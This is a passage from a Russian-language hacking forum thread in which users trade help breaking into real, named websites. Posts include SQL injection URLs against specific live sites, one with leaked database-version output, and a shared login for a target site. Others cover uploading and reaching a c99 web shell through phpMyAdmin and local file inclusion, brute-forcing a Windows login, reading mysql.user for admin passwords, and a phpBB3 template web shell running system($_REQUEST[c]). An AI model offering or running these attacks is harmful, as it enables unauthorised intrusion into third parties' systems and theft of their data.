Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. foozzi

    foozzi Member

    Joined:
    13 Apr 2010
    Messages:
    195
    Likes Received:
    12
    Reputations:
    5
    можно поподробней?
     
  2. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    LFI (Local File Include) - это тип уязвимости. Подробнее в поиске.
    Папка с правами - папка, в которую возможно записать что-либо, и которая доступна из-под веба.
     
  3. asql

    asql New Member

    Joined:
    19 Feb 2011
    Messages:
    32
    Likes Received:
    0
    Reputations:
    -3
    Как здесь хоть что то вывести?
    http://pocketbook.by/index.php?id=-200+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
     
  4. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12

    http://pocketbook.by/index.php?id=200+and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+(select+1+union+select+2+union+select+3)x+group+by+2+limit+1)a)+--+


    Duplicate entry '5.0.51a-24+lenny4-log1' for key 1
     
    1 person likes this.
  5. Compton

    Compton Member

    Joined:
    31 Jan 2010
    Messages:
    290
    Likes Received:
    25
    Reputations:
    0
    Заливаю шелл через форму отправки изображений. При загрузке имя файла меняется на .jpg/.gif и т.д. Знаю папку куда все складывается,но прямого доступа к ней не имею. Шелл с расширением .php.jpg переименовывается в .jpg + замена имени. Как быть?
     
  6. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204

    https://rdot.org/forum/showpost.php?p=1142&postcount=6
     
  7. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Какая здесь версия БД?

    http://www.carolinarentalsonline.com/detail.asp?id=43
     
    1 person likes this.
  8. Lijzer

    Lijzer Member

    Joined:
    5 Nov 2010
    Messages:
    92
    Likes Received:
    8
    Reputations:
    4
    Ребят задался вопросом. Есть ли по дефолту в вин2008, число неудачных попыток входов в систему, после чего лок? Просто 3-и сутки медузой перебираю безрезультатно (Хотя знаю, что в словаре точно есть правильный пасс)
     
  9. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Здесь вывести через ошибку возможно?

    https://www.nyhistory.org/web/default.php?section=public_programs&page=detail&program=1499350+%6f%72%64%65%72+by+1000+--+
     
    1 person likes this.
  10. Oza

    Oza Banned

    Joined:
    19 Jan 2009
    Messages:
    0
    Likes Received:
    13
    Reputations:
    -1
    Имеется sqli в mssql без вывода ошибки.
    Сайт: www.truck market.ru

    Перед проведением атаки следует вторизоваться тут: http://www.truckmarket.ru/enter.php. Например по этому акку: login:a1840198 pass:a1840198

    sqli:
    По логике: если запрос верен - в текстбокстах отображается уже имеющаяся инфа.

    Ступор на получении списка таблиц. Получаем одну так:

    Далее пробую сначала брать следующию так:
    Но удается выудить только три, потом идет повтор:
    Опять повтор. Почитал доки. select top - возвращает случайныую запись. Умельцы как-то убирают случайность, добовляя в конец order+by+<*>. Но я не докурил как =(

    Подставляя случайные слова в первый методе смог получить вот такой список таблиц:
    Как вытащить все таблицы? Мне бы увидеть пример имуляции limit, вывести колонки и инфу думаю смогу сам.

    p.s

    Проблема с данной уязвимостью, уже постилась на rdot.org
    Но 2ва дня не кто помочь не может.
     
  11. asql

    asql New Member

    Joined:
    19 Feb 2011
    Messages:
    32
    Likes Received:
    0
    Reputations:
    -3
    Как можно это обработать на "чистый" лист?
    http://www.elitecrownmoldings.com/home.php?cat=6
    кстати, тут походу у пользователя есть права на INSERT =)

    и еще вопросик, как можно узнать привилегии пользователя mysql, ну и других дб?
     
    #16371 asql, 13 Mar 2011
    Last edited: 14 Mar 2011
  12. foozzi

    foozzi Member

    Joined:
    13 Apr 2010
    Messages:
    195
    Likes Received:
    12
    Reputations:
    5
    залили шелл через pma
    узнал путь /var/lib/mysql/tmp/c99.php
    но теперь как шелл то сам юзануть?
     
  13. Lijzer

    Lijzer Member

    Joined:
    5 Nov 2010
    Messages:
    92
    Likes Received:
    8
    Reputations:
    4
    инклюд локальный, больше никак ...
     
  14. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Дело не в правах пользователя на INSERT, а в том что в уязвимый запрос входит команда INSERT.

    Могу сказать, что INSERT-иньекцию провести не удасться, т.к. в запрос входит путь, который подделать\обрезать не возможно.

    Code:
    /product.php?prod'uctid=256 => INSERT INTO xcart_stats_pages(page) VALUES('/product.php?prod'uctid=256')
    /pro'duct.php?productid=256 => Not Found
    
    Мдя уж, забавно ;)

    По поводу привилегий:
    Максимальный привелегии, что у тебя могут быть (которые помогаю в SQLi) это доступ на чтение mysql.user, чтобы узнать пасс админа MySQL и подключиться удаленно\к phpMyAdmin, если есть, ну или пробрутить FTP\SSH.
    Ну или file_priv, что тебе позволяет читать файлы, а при отсутсвие mq, то и заливать файлы ;)
    Ну и обычно если есть доступ к mysql.user, то и есть доступ в file_priv.

    Ну и по поводу раскручивания данной инъекции.
    Запрос выдает ошибку только при кавычке подставленной, если ее нет, то все отбрасываеться.
    Попробуй избавиться от ошибки при кавычке.


    Ты залил шелл в /tmp, в котором храняться файлы сессий, к которому нету доступа из под веба, то есть никак не прочитать (ну если нету LFI\RFI). Попробуй просканить сайт на директории, посмотри в каких папках лежат картинки\js\css \etc и пробуй залить во все эти диры, ведь я, надеюсь, у тебя есть путь к сайту? Если нету то читай мой пост пару страниц ниже...
     
    #16374 Tigger, 14 Mar 2011
    Last edited: 14 Mar 2011
  15. foozzi

    foozzi Member

    Joined:
    13 Apr 2010
    Messages:
    195
    Likes Received:
    12
    Reputations:
    5
    нашол путь тот который надо
    http://www.xxx.ru/show.php?f=../../../../var/lib/mysql/c99.php

    но там пустая страница, тоесть меню сайта и шапка есть а там где контент пусто

    пробовал залить в js (такая папка есть) но не могу точный путь найти к ней, читал etc/passwd там ничего такого нет
     
    #16375 foozzi, 14 Mar 2011
    Last edited: 14 Mar 2011
  16. Lijzer

    Lijzer Member

    Joined:
    5 Nov 2010
    Messages:
    92
    Likes Received:
    8
    Reputations:
    4
    DirBuster тебе в помощь...
     
  17. noviyuser

    noviyuser Member

    Joined:
    18 Nov 2010
    Messages:
    645
    Likes Received:
    18
    Reputations:
    6
    как можно залить шелл в PhpBB версии 3.0.8 имея доступ в админку
    Гугл не помог
     
  18. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    google.ru > Заливка шелла phpbb3 site:forum.antichat.ru
    google.ru > Заливка шелла phpbb3 site:rdot.org
    гуглим правильно (с)
     
    1 person likes this.
  19. stan_q

    stan_q Member

    Joined:
    1 Aug 2009
    Messages:
    0
    Likes Received:
    5
    Reputations:
    0
    Заливка шела через темплейты в phpBB3 (необходим доступ в админку).

    1. Разрешаем выполнение пхп в темплейтах. Устанавливаем галочку в Основные настройки(General Settings) -> Настройки безопасности(Security Settings) -> Разрешить выполнение пхп в темплейтах (Allow php in templates).
    2. Далее в стилях выбираем необходимый темплейт и прописываем необходимый пхп код в следующей конструкции:

    <!-- PHP -->
    system($_REQUEST[c]);
    <!-- ENDPHP -->

    Источник
     
    1 person likes this.
  20. noviyuser

    noviyuser Member

    Joined:
    18 Nov 2010
    Messages:
    645
    Likes Received:
    18
    Reputations:
    6

    :confused: что неправильно сделано?
     
    #16380 noviyuser, 14 Mar 2011
    Last edited: 14 Mar 2011
Thread Status:
Not open for further replies.